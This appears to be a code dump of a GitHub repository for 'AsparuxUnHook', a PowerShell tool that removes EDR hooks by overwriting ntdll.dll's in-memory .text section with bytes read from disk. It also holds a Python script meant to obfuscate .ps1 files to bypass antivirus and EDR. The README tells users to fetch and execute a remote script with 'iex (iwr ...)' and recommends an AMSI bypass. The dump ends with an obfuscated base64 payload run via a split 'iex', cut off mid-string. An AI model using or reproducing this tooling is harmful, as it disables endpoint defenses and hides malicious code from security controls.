[String] 407 | $Procedure 408 | ) 409 | 410 | $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | 411 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } 412 | $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') 413 | $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') 414 | $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress',[Type[]]@([System.Runtime.InteropServices.HandleRef], [String])) 415 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) 416 | $tmpPtr = New-Object IntPtr 417 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) 418 | Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) 419 | } 420 | 421 | #PEInfo must contain the following NoteProperties: 422 | # PEHandle: An IntPtr to the address the PE is loaded to in memory 423 | Function Get-PEDetailedInfo 424 | { 425 | Param( 426 | [Parameter( Position = 0, Mandatory = $true)] 427 | [IntPtr] 428 | $PEHandle, 429 | 430 | [Parameter(Position = 1, Mandatory = $true)] 431 | [System.Object] 432 | $Win32Types 433 | ) 434 | 435 | if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero) 436 | { 437 | throw 'PEHandle is null or IntPtr.Zero' 438 | } 439 | 440 | $PEInfo = New-Object System.Object 441 | 442 | $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types 443 | 444 | $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle 445 | $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) 446 | $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) 447 | $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit) 448 | $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) 449 | 450 | if ($PEInfo.PE64Bit -eq $true) 451 | { 452 | [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64))) 453 | $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr 454 | } 455 | else 456 | { 457 | [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32))) 458 | $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr 459 | } 460 | 461 | return $PEInfo 462 | } 463 | 464 | Function Get-Win32Functions 465 | { 466 | 467 | # I will only need VirtualProtect for unhooking. 468 | $Win32Functions = New-Object System.Object 469 | 470 | $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect 471 | $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) 472 | $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) 473 | $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect 474 | 475 | return $Win32Functions 476 | } 477 | 478 | #Copy-Sections based function of PowerSploit (https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1#L1551) 479 | Function Unhooking 480 | { 481 | Param( 482 | [Parameter(Position = 0, Mandatory = $true)] 483 | [Byte[]] 484 | $PEBytes, 485 | 486 | [Parameter(Position = 1, Mandatory = $true)] 487 | [System.Object] 488 | $PEInfo, 489 | 490 | [Parameter(Position = 2, Mandatory = $true)] 491 | [System.Object] 492 | $Win32Functions, 493 | 494 | [Parameter(Position = 3, Mandatory = $true)] 495 | [System.Object] 496 | $Win32Types 497 | ) 498 | 499 | # Iterate on the sections of the PE 500 | for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) 501 | { 502 | 503 | [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) 504 | $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) 505 | 506 | #Verify if the iterated section is the .text section 507 | if (($SectionHeader.Name -join '') -eq ".text") { 508 | 509 | #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated 510 | # in memory for the section 511 | $offset = $SectionHeader.PointerToRawData 512 | Write-Verbose "[*] PointerToRawData .text: $($SectionHeader.PointerToRawData)" 513 | Write-Verbose "[*] SizeOfRawData .text: $($SectionHeader.SizeOfRawData)" 514 | Write-Verbose "[*] VirtualAddress .text: $($SectionHeader.VirtualAddress)" 515 | 516 | # Calculate the size of the .text section on disk 517 | $size = $SectionHeader.SizeOfRawData + $offset - 1 518 | 519 | # Index from the previously read ntdll bytes only what we need (.text section) 520 | $newBytes = $PEBytes[$offset..$size] 521 | 522 | # We add the base address (BaseAddres) of ntdl and the virtual address of ntdll 523 | # to obtain the offset of our .text section in memory. 524 | [IntPtr]$offsetVirtual = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionHeader.VirtualAddress) ([Int64]$PEInfo.PEHandle)) 525 | Write-Verbose "[*] Virtual .text offset: $offsetVirtual" 526 | 527 | $PAGE_EXECUTE_READWRITE = 0x40 528 | 529 | [UInt32]$OldProtectFlag = 0 530 | # We modify the permissions of our .text section to be able to overwrite in it 531 | $Success = $Win32Functions.VirtualProtect.Invoke($offsetVirtual, $newBytes.Length, $PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) 532 | if ($Success -eq $false) 533 | { 534 | Throw "[!] Unable to change memory protection" 535 | } 536 | 537 | Write-Verbose "[*] Writing clean bytes to our .text section of ntdll.dll" 538 | 539 | # We write our clean bytes over our ntdll 540 | Write-BytesToMemory -Bytes $newBytes -MemoryAddress $offsetVirtual 541 | return 542 | } 543 | 544 | } 545 | } 546 | 547 | # Function based on Write-BytesToMemory from PowerSploit 548 | Function Read-BytesToMemory 549 | { 550 | Param( 551 | [Parameter(Position=0, Mandatory = $true)] 552 | [Int] 553 | $Length, 554 | 555 | [Parameter(Position=1, Mandatory = $true)] 556 | [IntPtr] 557 | $MemoryAddress 558 | ) 559 | 560 | for ($Offset = 0; $Offset -lt $Length; $Offset++) 561 | { 562 | [System.Runtime.InteropServices.Marshal]::ReadByte([IntPtr]::Add($MemoryAddress, $Offset)) 563 | } 564 | } 565 | 566 | Function Main() 567 | { 568 | 569 | $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) 570 | if ($PtrSize -eq 4) { 571 | Throw "[!] AsparuxUnHook only works for 64 bits" 572 | } 573 | 574 | Write-Verbose "PowerShell ProcessID: $PID" 575 | 576 | # We try to check for hooks 577 | $HookCheck = [Byte[]](0x4c, 0x8b, 0xd1, 0xb8) 578 | $NtAllocateVirtualMemory = Get-ProcAddress ntdll.dll NtAllocateVirtualMemory 579 | 580 | [Byte[]] $BytesFunc = Read-BytesToMemory 4 $NtAllocateVirtualMemory 581 | $hexBytes = ($BytesFunc | ForEach-Object { "0x{0:X2}" -f $_ }) -join ', ' 582 | if (![System.Linq.Enumerable]::SequenceEqual($HookCheck, $BytesFunc)) { 583 | Write-Host "[*] Hooked function found: $hexBytes" -ForegroundColor Cyan 584 | } else { 585 | Write-Host "[*] Hooked function not found: $hexBytes" -ForegroundColor Red 586 | return 587 | } 588 | 589 | # We read clean ntdll from disk 590 | [Byte[]] $PEBytes = Get-Content -Encoding byte -Raw -Path "C:\Windows\System32\ntdll.dll" 591 | Write-Verbose "[*] Reading ntdll.dll from disk" 592 | 593 | # Simple way to obtain the base address of a dll without PEB Walking 594 | $Proc = Get-Process -Id $Pid 595 | $ntdll = ($Proc.Modules | Where-Object {$_.ModuleName -eq 'ntdll.dll'}).BaseAddress 596 | Write-Verbose "[*] The base address of ntdll.dll is: $ntdll" 597 | 598 | $Types = Get-Win32Types 599 | $Win32Functions = Get-Win32Functions 600 | 601 | Write-Verbose "[*] Getting detailed PE information from the headers loaded in memory" 602 | $PEInfo = Get-PEDetailedInfo -PEHandle $ntdll -Win32Types $Types 603 | 604 | Unhooking -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Types 605 | 606 | # We check if hooks are still present. 607 | [Byte[]] $BytesFunc = Read-BytesToMemory 4 $NtAllocateVirtualMemory 608 | $hexBytes = ($BytesFunc | ForEach-Object { "0x{0:X2}" -f $_ }) -join ', ' 609 | if ([System.Linq.Enumerable]::SequenceEqual($HookCheck, $BytesFunc)) { 610 | Write-Host "[*] Successful unhooking: $hexBytes" -ForegroundColor Green 611 | } else { 612 | Write-Host "[*] Unsuccessful unhooking: $hexBytes" -ForegroundColor Red 613 | } 614 | 615 | 616 | } 617 | 618 | Main 619 | } 620 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AsparuxUnHook 2 | 3 | AsparuxUnHook is an advanced tool written in PowerShell that uses Reflection to access the Windows API and low-level functions. This tool focuses on cleaning the hooks present in the ntdll.dll module from memory, restoring its original state by reading ntdll.dll directly from disk. 4 | 5 | FUNCTION HOOKED --> 6 | 7 | ![imatge](https://github.com/user-attachments/assets/bf8551e6-c9ae-479f-89fd-51a59a447175) 8 | 9 | 10 | FUNCTION UNHOOKED (Clear function after running AsparuxUnHook) --> 11 | 12 | ![imatge](https://github.com/user-attachments/assets/77e4e26b-fd9d-4fed-8380-9934aed1a719) 13 | 14 | 15 | # Instruction 16 | 17 | ``` 18 | iex (iwr -UseBasicParsing https://raw.githubusercontent.com/ASP4RUX/ReflectionUnHook/refs/heads/main/ofuscateasparuxunhook.ps1) 19 | ``` 20 | 21 | ``` 22 | Invoke-AsparuxUnHook 23 | ``` 24 | 25 | ``` 26 | Invoke-AsparuxUnHook -v 27 | ``` 28 | 29 | #Recomendation 30 | 31 | I recommend using the Invoke-ASAMSI that I have in my github followed by running AsparuxUnHook 32 | -------------------------------------------------------------------------------- /asamsiobfuscate.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import sys 5 | import locale 6 | import os 7 | import zlib 8 | import base64 9 | import ctypes 10 | import atexit 11 | 12 | # ANSI Colors 13 | FAIL = "\033[91m" 14 | OKGREEN = "\033[92m" 15 | ENDC = "\033[0m" 16 | HEADER = "\033[95m" 17 | 18 | # Function for colors in Windows 19 | def init(): 20 | def restore_console(): 21 | # Restore the original console mode 22 | print(ENDC, end="") 23 | stdout = ctypes.windll.kernel32.GetStdHandle(-11) 24 | ctypes.windll.kernel32.SetConsoleMode(stdout, original_mode) 25 | 26 | if os.name == 'nt': 27 | # Get the handle of the standard output 28 | stdout = ctypes.windll.kernel32.GetStdHandle(-11) # -11 representa STD_OUTPUT_HANDLE 29 | 30 | # Save the original console mode 31 | global original_mode 32 | original_mode = ctypes.c_uint32() 33 | 34 | ctypes.windll.kernel32.GetConsoleMode(stdout, ctypes.byref(original_mode)) 35 | 36 | # Enable special character processing 37 | new_mode = original_mode.value | 0x0004 38 | ctypes.windll.kernel32.SetConsoleMode(stdout, new_mode) 39 | atexit.register(restore_console) 40 | 41 | init() 42 | 43 | # Detect the system language 44 | lang, _ = locale.getlocale() 45 | 46 | # Configure messages according to language 47 | if lang.startswith("es"): # Spanish 48 | description = "Ofusca archvios .ps1 para evadir controles de AV/EDR por HTTP." 49 | epilog = "Ejemplo: python NullObfuscate.py -f archivo.ps1 -o salida.ps1" 50 | help_file = "Archivo .ps1 a ofuscar" 51 | help_out = "Nombre del archivo de salida" 52 | else: # English (default) 53 | description = "Obfuscate .ps1 files to bypass AV/EDR controls over HTTP." 54 | epilog = "Example: python NullObfuscate.py -f file.ps1 -o out.ps1" 55 | help_file = ".ps1 file to obfuscate" 56 | help_out = "Output file name" 57 | 58 | # Configure parser 59 | parser = argparse.ArgumentParser( 60 | description=description, 61 | epilog=epilog, 62 | formatter_class=argparse.ArgumentDefaultsHelpFormatter 63 | ) 64 | 65 | # Adding arguments 66 | parser.add_argument("-f", "--file", type=str, help=help_file) 67 | parser.add_argument("-o", "--output", type=str, default="out.ps1", help=help_out) 68 | 69 | # Show help if there are no arguments 70 | if len(sys.argv) == 1: 71 | parser.print_help() 72 | sys.exit(1) 73 | 74 | # Parse arguments 75 | args = parser.parse_args() 76 | 77 | # Check if the file exists 78 | if os.path.exists(args.file): 79 | try: 80 | # Open the file as read 81 | with open(args.file, 'r') as f: 82 | strr = f.read() 83 | string_val = strr.encode() 84 | 85 | # We compress the content 86 | zlibbed_str = zlib.compress(string_val) 87 | compressed_string = zlibbed_str[2:-4] 88 | 89 | # Format and use base64 to use it in PowerShell 90 | powershell_command = """$c ="Defla" + "teStream";$b = "Compre" + "ssion"; $a ="Strea" + "mReader"; .("i"+"ex") $(New-Object IO.$a ($(New-Object IO.$b.$c ($(New-Object IO.MemoryStream(,$([Convert]::("FromB" +"ase6" + "4String")("{}")))), [IO.Compression.CompressionMode]::("De" +"compress"))), [Text.Encoding]::ASCII)).ReadToEnd();""" 91 | powershell_command = powershell_command.format(base64.b64encode(compressed_string).decode('ascii')) 92 | 93 | except Exception as err: 94 | # Error messages by language 95 | if lang.startswith("es"): 96 | print(f"{FAIL}[!] Error: Al abrir el archivo '{args.file}': {err}") 97 | else: 98 | print(f"{FAIL}[!] Error: When opening the file '{args.file}': {err}") 99 | sys.exit(1) 100 | 101 | try: 102 | # We write the output to a file 103 | with open(args.output, 'w') as file: 104 | file.write(powershell_command) 105 | if lang.startswith("es"): 106 | print(f"{OKGREEN}[+] Archivo {args.file} ofuscado correctamente!") 107 | print(f"{HEADER}[i] Guardado como: {args.output}") 108 | else: 109 | print(f"{OKGREEN}[+] File {args.file} obfuscated successfully!") 110 | print(f"{HEADER}[i] Saved as: {args.output}") 111 | 112 | except Exception as err: 113 | # More errors 114 | if lang.startswith("es"): 115 | print(f"{FAIL}[!] Error: Al abrir el archivo '{args.output}': {err}") 116 | else: 117 | print(f"{FAIL}[!] Error: When opening the file '{args.output}': {err}") 118 | 119 | else: 120 | # More errors if file dont exist 121 | if lang.startswith("es"): 122 | print(f"{FAIL}[!] El archivo '{args.file}' no existe.") 123 | else: 124 | print(f"{FAIL}[!] The file '{args.file}' does not exist.") 125 | -------------------------------------------------------------------------------- /ofuscateasparuxunhook.ps1: -------------------------------------------------------------------------------- 1 | $c ="Defla" + "teStream";$b = "Compre" + "ssion"; $a ="Strea" + "mReader"; .("i"+"ex") $(New-Object IO.$a ($(New-Object IO.$b.$c ($(New-Object IO.MemoryStream(,$([Convert]::("FromB" +"ase6" + "4String")("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